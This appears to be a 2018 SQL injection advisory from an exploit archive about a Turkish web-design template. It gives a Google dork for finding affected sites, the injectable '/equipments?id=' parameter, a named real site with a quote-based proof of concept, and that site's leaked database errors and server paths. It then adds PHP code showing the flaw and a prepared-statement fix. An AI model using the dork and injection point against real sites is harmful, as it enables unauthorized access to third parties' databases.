Tasarım Güzel Günler Tanıtım Web Design SQL Injection

Author: KingSkrupellos , Published: 08-10-2018
# Exploit Title : Tasarım Güzel Günler Tanıtım Web Design SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 06/10/2018
# Vendor Homepage : guzelgunler.com.tr
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#################################################################################################

# Google Dork :

intext:''Tasarım: Güzel Günler Tanıtım''

# SQL Injection Exploit :

/equipments?id=[SQL Injection]

#################################################################################################

# Example Vulnerable Site =>

waggonltd.com/equipments?id=10%27 => [ Proof of Concept ] => archive.is/Z9N7v

# SQL Database Error =>

Deprecated: mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/waggonltd/domains/waggonltd.com/public_html/inc/config.php on line 9

Warning: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 in /home/waggonltd/domains/waggonltd.com/public_html/inc/lib/db/mysqli/ez_sql_mysqli.php on line 266

Notice: Trying to get property of non-object in /home/waggonltd/domains/waggonltd.com/public_html/theme/tema/hizmetler.php on line 18

Warning: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' order by id desc' at line 1 in /home/waggonltd/domains/waggonltd.com/public_html/inc/lib/db/mysqli/ez_sql_mysqli.php on line 266
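The error trace above points at a query of the shape `... where id='<id>' order by id desc` built from the raw `id` parameter, with PHP error display switched on so driver messages and server paths reach the client. As an added example, not the vendor's code, here is that pattern in PHP beside a hardened version using mysqli prepared statements and input validation; the table name, column names and function names are assumptions.

```php
<?php
// Added example, not the vendor's code. The error trace in the advisory
// suggests a query like:  select * from equipments where id='$id' order by id desc
// assembled by string concatenation. Table/column names are assumptions.

declare(strict_types=1);

/** Vulnerable pattern: the untrusted GET value is spliced into the SQL text. */
function buildEquipmentQueryVulnerable(string $id): string
{
    // A stray single quote in $id terminates the string literal early, which
    // is what produces the "near '' order by id desc'" syntax error above.
    return "select * from equipments where id='" . $id . "' order by id desc";
}

/** Hardened: validate the identifier, then pass it as a bound parameter. */
function fetchEquipment(mysqli $db, string $rawId): ?array
{
    // /equipments?id= is a numeric key, so anything that is not a
    // positive integer is rejected before it gets near the database.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }

    // The placeholder keeps data separate from SQL text; no quoting is involved.
    $stmt = $db->prepare('select * from equipments where id = ? order by id desc');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    return $row ?: null;
}

// Error handling: raise exceptions instead of printing driver warnings,
// and keep PHP errors in the server log rather than in the HTTP response,
// so stack traces and filesystem paths like those above are not disclosed.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);
ini_set('display_errors', '0');
ini_set('log_errors', '1');
```

Calling `buildEquipmentQueryVulnerable("10'")` yields `... where id='10'' order by id desc`, the malformed statement MySQL rejects in the trace; `fetchEquipment($db, "10'")` returns `null` without ever issuing a query.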

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################